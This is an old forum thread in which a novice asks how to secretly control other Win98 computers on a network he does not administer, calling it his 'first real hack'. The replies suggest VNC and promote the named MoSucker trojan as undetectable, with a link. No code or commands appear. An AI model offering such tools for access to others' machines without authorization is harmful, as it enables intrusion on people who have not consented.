Thread: Controlling A Win98 Network?

Question Controlling A Win98 Network?

Okay I'm at a Win98 client computer connected to a small network. Security is relatively low. How can I run and access programs on other client and even the main computer. Please give me some links, advice, or something.

Banned
    trojan?

Re: Controlling A Win98 Network?

Originally posted by mdzw
    Okay I'm at a Win98 client computer connected to a small network. Security is relatively low. How can I run and access programs on other client and even the main computer. Please give me some links, advice, or something.
    You say you want to run and access programs on other client(s?) and even the main computer.

I (we) need more clarification on this, do you want remote access? physical access (where the programs or whatever you want is password protected?) ...what exactly do you want...?

It also helps to state the protection schemes the network is using. Just so we can help you further.
    ...This Space For Rent.

-[WebCarnage]

Unhappy sorry my bad

I'm an newbie and this network will be my first real hack. Sorry I didn't give more info (This is going to be detailed). The network I'm talking about is in one room and controlled by a single computer. I won't be able to sit right in front of the main computer. I want to be able to for instance control another computer on the network from the computer that I'm sitting at. All the computers connected to the main computer are configured exactly the same. See I don't know much about networks or how to even access another computer over a network. If I need to go read let me know. But if there is an easy approach that would be nice. I'm doing this for educational purposes only so I won't be hurting the other computers. Are there any online tutorials you can point me to. Thanks for the help,

-Mike

Hi mom!
    For this purpose I'd use VNC. It's a bit like PC Anywere, but free :)

Red face this tool rocks!

Use mosucker, the best trojan so far www.mosucker.de
    best than vnc and any remote admin tool, indetectable too, so small and is compatible with win 95/98/nt/2000/xp any language, that means 90% pc's worldwide even YOU can use it, but please, be nice, is a trojan, but it can be used for good things, so dont try to hack anything before you know what u're doing